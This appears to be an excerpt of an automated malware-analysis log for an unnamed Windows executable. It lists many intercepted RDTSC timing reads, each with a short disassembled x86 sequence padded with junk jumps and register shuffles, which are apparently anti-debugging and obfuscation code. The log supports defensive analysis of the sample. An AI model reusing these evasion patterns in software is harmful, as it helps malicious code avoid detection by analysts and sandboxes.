Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410501 second address: 7410535 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE9093D6548h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410535 second address: 7410539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410539 second address: 741053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741053F second address: 7410563 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE908EE710Ch 0x00000009 and eax, 61485C78h 0x0000000f jmp 00007FE908EE710Bh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410563 second address: 741058A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a jmp 00007FE9093D6544h 0x0000000f mov dword ptr [esi+10h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741058A second address: 741058E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741058E second address: 7410594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410594 second address: 74105E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c pushad 0x0000000d mov dx, AC4Ch 0x00000011 mov dl, 41h 0x00000013 popad 0x00000014 mov dword ptr [esi+14h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE908EE7119h 0x00000020 and eax, 432977D6h 0x00000026 jmp 00007FE908EE7111h 0x0000002b popfd 0x0000002c push eax 0x0000002d pop ebx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410724 second address: 7410741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE9093D653Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410741 second address: 741078B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+28h], eax 0x0000000c jmp 00007FE908EE710Eh 0x00000011 mov eax, dword ptr [ebx+68h] 0x00000014 jmp 00007FE908EE7110h 0x00000019 mov dword ptr [esi+2Ch], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741078B second address: 741078F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741078F second address: 7410793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410793 second address: 7410799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410799 second address: 74107D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bl, 27h 0x00000012 jmp 00007FE908EE7116h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74107D1 second address: 7410823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007FE9093D6546h 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 pushad 0x0000001a jmp 00007FE9093D653Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007FE9093D6540h 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410823 second address: 741086A instructions: 0x00000000 rdtsc 0x00000002 movsx edx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov word ptr [esi+32h], ax 0x0000000c jmp 00007FE908EE710Ah 0x00000011 mov eax, dword ptr [ebx+0000008Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE908EE710Dh 0x00000020 add si, 9886h 0x00000025 jmp 00007FE908EE7111h 0x0000002a popfd 0x0000002b mov dh, ah 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741086A second address: 7410887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D6549h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410887 second address: 74108AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE908EE7118h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108AC second address: 74108C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108C4 second address: 74108C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108C8 second address: 74108CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108CE second address: 74108D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108D4 second address: 74108D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74108D8 second address: 7410948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7114h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e jmp 00007FE908EE7110h 0x00000013 mov eax, dword ptr [ebx+1Ch] 0x00000016 jmp 00007FE908EE7110h 0x0000001b mov dword ptr [esi+3Ch], eax 0x0000001e jmp 00007FE908EE7110h 0x00000023 mov eax, dword ptr [ebx+20h] 0x00000026 pushad 0x00000027 mov dx, si 0x0000002a mov esi, 527EC369h 0x0000002f popad 0x00000030 mov dword ptr [esi+40h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FE908EE710Bh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410948 second address: 741094E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741094E second address: 741098C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+00000080h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FE908EE7112h 0x0000001a and ax, 7498h 0x0000001f jmp 00007FE908EE710Bh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 741098C second address: 7410990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410990 second address: 7410A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov al, 06h 0x00000008 popad 0x00000009 push 00000001h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE908EE7117h 0x00000012 add cx, 1A0Eh 0x00000017 jmp 00007FE908EE7119h 0x0000001c popfd 0x0000001d push eax 0x0000001e mov si, dx 0x00000021 pop ebx 0x00000022 popad 0x00000023 nop 0x00000024 pushad 0x00000025 push ecx 0x00000026 push edx 0x00000027 pop esi 0x00000028 pop edx 0x00000029 pushfd 0x0000002a jmp 00007FE908EE710Ch 0x0000002f add esi, 1F0483B8h 0x00000035 jmp 00007FE908EE710Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e mov bx, 1FDAh 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FE908EE7111h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410A18 second address: 7410ABB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE9093D6540h 0x00000008 sub ch, 00000048h 0x0000000b jmp 00007FE9093D653Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 movzx eax, bx 0x00000019 pushfd 0x0000001a jmp 00007FE9093D6541h 0x0000001f xor cx, 2266h 0x00000024 jmp 00007FE9093D6541h 0x00000029 popfd 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e pushad 0x0000002f call 00007FE9093D653Ch 0x00000034 pop esi 0x00000035 push edx 0x00000036 pushfd 0x00000037 jmp 00007FE9093D653Ah 0x0000003c or esi, 508F8D38h 0x00000042 jmp 00007FE9093D653Bh 0x00000047 popfd 0x00000048 pop ecx 0x00000049 popad 0x0000004a push edx 0x0000004b jmp 00007FE9093D6544h 0x00000050 mov dword ptr [esp], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410ABB second address: 7410ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410ABF second address: 7410ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B64 second address: 7410B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B68 second address: 7410B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B83 second address: 7410B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B9B second address: 7410B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410B9F second address: 7410C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FE978905C22h 0x0000000e pushad 0x0000000f mov dl, 07h 0x00000011 pushfd 0x00000012 jmp 00007FE908EE7116h 0x00000017 sub al, 00000038h 0x0000001a jmp 00007FE908EE710Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [ebp-0Ch] 0x00000024 jmp 00007FE908EE7116h 0x00000029 mov dword ptr [esi+04h], eax 0x0000002c pushad 0x0000002d movzx eax, di 0x00000030 push edx 0x00000031 mov edi, eax 0x00000033 pop eax 0x00000034 popad 0x00000035 lea eax, dword ptr [ebx+78h] 0x00000038 jmp 00007FE908EE7111h 0x0000003d push 00000001h 0x0000003f jmp 00007FE908EE710Eh 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FE908EE710Ah 0x0000004e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410C2F second address: 7410C35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410C35 second address: 7410CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE908EE710Bh 0x0000000f nop 0x00000010 pushad 0x00000011 jmp 00007FE908EE7114h 0x00000016 pushfd 0x00000017 jmp 00007FE908EE7112h 0x0000001c jmp 00007FE908EE7115h 0x00000021 popfd 0x00000022 popad 0x00000023 lea eax, dword ptr [ebp-08h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FE908EE710Ch 0x0000002d sub ecx, 09C4CE78h 0x00000033 jmp 00007FE908EE710Bh 0x00000038 popfd 0x00000039 mov dl, cl 0x0000003b popad 0x0000003c push esi 0x0000003d jmp 00007FE908EE7110h 0x00000042 mov dword ptr [esp], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FE908EE7117h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D32 second address: 7410D38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D38 second address: 7410D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D3C second address: 7410D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D4C second address: 7410D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D50 second address: 7410D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D56 second address: 7410D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FE978905A5Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D71 second address: 7410D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410D8C second address: 7410DA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE7114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410DA4 second address: 7410DA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410DA8 second address: 7410E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp-04h] 0x0000000b jmp 00007FE908EE7117h 0x00000010 mov dword ptr [esi+08h], eax 0x00000013 jmp 00007FE908EE7116h 0x00000018 lea eax, dword ptr [ebx+70h] 0x0000001b jmp 00007FE908EE7110h 0x00000020 push 00000001h 0x00000022 jmp 00007FE908EE7110h 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov dx, EDF0h 0x0000002f mov si, dx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E14 second address: 7410E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE9093D653Bh 0x0000000f nop 0x00000010 pushad 0x00000011 push eax 0x00000012 movsx edx, cx 0x00000015 pop ecx 0x00000016 call 00007FE9093D653Dh 0x0000001b mov ecx, 5FA2F357h 0x00000020 pop eax 0x00000021 popad 0x00000022 lea eax, dword ptr [ebp-18h] 0x00000025 pushad 0x00000026 jmp 00007FE9093D6549h 0x0000002b movzx esi, dx 0x0000002e popad 0x0000002f push esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FE9093D6542h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E89 second address: 7410E98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE710Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E98 second address: 7410E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7410E9E second address: 7410EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74605B9 second address: 74605E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE908EE7111h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE908EE7111h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74605E7 second address: 74605FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74605FA second address: 7460623 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2958A60Ah 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE908EE7119h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460623 second address: 7460657 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D6541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE9093D6548h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460657 second address: 746065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 746065B second address: 7460661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460661 second address: 74606D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE908EE710Ch 0x00000009 sub cx, 43B8h 0x0000000e jmp 00007FE908EE710Bh 0x00000013 popfd 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FE908EE7110h 0x00000023 xor cx, FE18h 0x00000028 jmp 00007FE908EE710Bh 0x0000002d popfd 0x0000002e pushad 0x0000002f movzx ecx, bx 0x00000032 jmp 00007FE908EE710Bh 0x00000037 popad 0x00000038 popad 0x00000039 sub ecx, ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE908EE7112h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74606D4 second address: 74606E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9093D653Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74606E6 second address: 7460704 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE908EE7113h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460704 second address: 74607D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9093D653Fh 0x00000009 and si, 5A4Eh 0x0000000e jmp 00007FE9093D6549h 0x00000013 popfd 0x00000014 mov ch, E6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], edi 0x0000001c pushad 0x0000001d pushad 0x0000001e movsx edi, cx 0x00000021 push esi 0x00000022 pop ebx 0x00000023 popad 0x00000024 call 00007FE9093D653Ch 0x00000029 pop edx 0x0000002a popad 0x0000002b mov eax, 00000001h 0x00000030 jmp 00007FE9093D653Ch 0x00000035 lock cmpxchg dword ptr [esi], ecx 0x00000039 pushad 0x0000003a mov ax, C57Dh 0x0000003e mov si, 3C79h 0x00000042 popad 0x00000043 mov ecx, eax 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007FE9093D6542h 0x0000004c jmp 00007FE9093D6545h 0x00000051 popfd 0x00000052 popad 0x00000053 cmp ecx, 01h 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushfd 0x0000005a jmp 00007FE9093D6546h 0x0000005f sbb ecx, 14579118h 0x00000065 jmp 00007FE9093D653Bh 0x0000006a popfd 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74607D1 second address: 74607D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 74607D6 second address: 7460851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE9093D6545h 0x00000009 jmp 00007FE9093D653Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jne 00007FE9792D8306h 0x00000018 jmp 00007FE9093D6545h 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, 77EEh 0x00000025 pushfd 0x00000026 jmp 00007FE9093D653Fh 0x0000002b and cx, B89Eh 0x00000030 jmp 00007FE9093D6549h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460851 second address: 7460861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE908EE710Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460861 second address: 7460865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7460865 second address: 74608A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 5F25184Fh 0x00000011 pushfd 0x00000012 jmp 00007FE908EE7114h 0x00000017 jmp 00007FE908EE7115h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 7420419 second address: 742041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742041E second address: 742045C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FE908EE7119h 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE908EE7118h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\yqUQPPp0LM.exeRDTSC instruction interceptor: First address: 742045C second address: 742046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9093D653Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
